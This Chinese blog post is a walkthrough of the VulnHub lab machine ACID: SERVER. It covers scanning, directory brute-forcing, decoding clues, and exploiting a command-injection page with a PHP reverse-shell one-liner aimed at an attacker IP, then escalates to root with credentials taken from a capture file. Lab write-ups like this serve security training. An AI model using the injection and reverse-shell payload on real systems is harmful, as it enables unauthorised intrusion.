VulnHub渗透测试实战靶场 - ACID: SERVER

Posted 2021-09-01 H3rmesk1t

VulnHub渗透测试实战靶场 - ACID: SERVER

• 环境下载
• ACID: SERVER靶机搭建
• 渗透测试
• • 信息收集
  • 漏洞挖掘
  • getshell
  • 提权

环境下载

戳此进行环境下载

ACID: SERVER靶机搭建

将下载好的靶机环境，导入VMware，将其网络适配设置为NAT模式，运行即可

渗透测试

信息收集

使用Kali自带的工具netdiscover进行子网探测：sudo netdiscover -r 192.168.246.0/24

用Nmap对获取到的靶机IP地址进行扫描：sudo nmap -sS -A -p 1-65535 192.168.246.130，发现其33447端口是开放的

漏洞挖掘

查看33447端口：http://192.168.246.130:33447/，F12查看源码时发现一个十六进制字符串0x643239334c6d70775a773d3d转字符串得到d293LmpwZw==解base64得到wow.jpg

用dirsearch爆破一下web目录：python3 dirsearch.py -u 192.168.246.130:33447 -e *.php

发现存在http://192.168.246.130:33447/images/，结合上一步解密得到的图片名字
访问：http://192.168.246.130:33447/images/wow.jpg，将图片下载下来分析：strings wow.jpg

在图片的结尾发现一串可疑字符：

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

用burpsuite的Decoder模块解码得到：7aee0f6d588ed9905ee37f16a7c610d4

看长度有点像hash值，尝试MD5解密，得到：63425

用DirBuster扫描一下web目录，发现index.php、error.php、cake.php、hacked.php、include.php

/Challenge/index.php页面的源代码中，可以找到js/forms.js打开发现在文件中有版权信息

谷歌搜索：peredur.net form_js，网页第一个链接就是，查看commit，在README.md中找到Email和Password相关信息

Username	: test_user 
Email		: test@example.com 
Password	: 6ZaxN2Vzm9NUJT2y

利用找到的默认信息成功登录，点击页面链接跳转到http://192.168.246.131:33447/Challenge/include.php

查看源码，在底部发现0x5933566a4c6e4a34626e413d，依照前面的思路解密得到Y3VjLnJ4bnA=，base64再次解密得到cuc.rxnp，rot13解密得到php.ekac，反过来就是cake.php

访问cake.php，根据页面提示再次进行目录扫描：python3 dirsearch.py -u 192.168.246.131:33447/Challenge/Magic_Box -e *.php

根据扫描结果，访问http://192.168.246.131:33447/Challenge/Magic_Box/command.php，测试后发现存在命令执行漏洞

getshell

起一个监听，在存在命令注入的页面执行：

www.baidu.com;php -r '$sock=fsockopen("192.168.246.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

提权

信息查找发现两个可疑用户：acid、saman

在acid的家目录加看到一个名为.sudo_as_admin_successful大小为0的文件，提示普通用户可以切换为root用户

查找acid这个用户的文件来获取他的密码来切换账户：find / -user acid 2>/dev/null，发现hint.pcapng流量包文件

用python搭建Server下载下来进行流量分析：python -m SimpleHTTPServer 9999

分析TCP协议，可以发现一段明文传输的对话，发现saman用户及其密码1337hax0r

用得到的密码切换saman用户后再sudo su提权到root，成功拿到root权限